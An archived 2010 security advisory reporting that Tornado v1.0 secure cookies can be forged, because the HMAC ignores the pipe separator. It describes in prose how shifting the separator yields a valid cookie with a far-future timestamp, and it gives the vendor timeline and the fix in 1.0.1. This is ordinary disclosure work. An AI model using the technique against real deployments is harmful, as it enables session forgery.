lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 16 Aug 2010 11:31:17 +0700
From: Nam Nguyen <>
Subject: Insecure secure cookie in Tornado


:Title: Insecure secure cookie in Tornado
:Severity: Low
:Reporter: Blue Moon Consulting
:Products: Tornado v1.0
:Fixed in: Tornado v1.0.1


Tornado is an open source version of the scalable, non-blocking web server and tools that power FriendFeed.

A secure cookie in Tornado is stored in three parts, separated by a pipe sign (``|``)



  is the cookie's value encoded in Base64, which does use the digits 0 to 9.

  is ``str(int(time.time()))``.

  is the keyed hash value of <value> and <timestamp> concatenated.

The problem is ``get_secure_cookie`` only checks for expired timestamp and the <hmac> does not take into account the separator character. An attacker, therefore, can move the pipe sign to the left by 4-character blocks to create another valid cookie, whose timestamp is in the far future, and value truncated by 3 characters.

This vulnerability is rated at low severity due to situational exploiting conditions.


There is no workaround.


Customers are advised to upgrade to at least version 1.0.1.


Blue Moon Consulting adapts `RFPolicy v2.0 <>`_ in notifying vendors.

:Initial vendor contact:

  August 13, 2010: Notice sent to Ben Darnell.

:Vendor response:

  August 13, 2010: Ben replied confirming the bug.

:Further communication:

  August 13, 2010: Ben added that the attacker would have to shift by 4 digits due to Base64 encoding.
  August 13, 2010: Ben added that version 1.0.1 would have a timestamp check.

:Public disclosure: August 16, 2010

:Exploit code:

  No exploit code required.


The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

Blue Moon Consulting Co., Ltd

Content of type "application/pgp-signature" skipped

Powered by blists - more mailing lists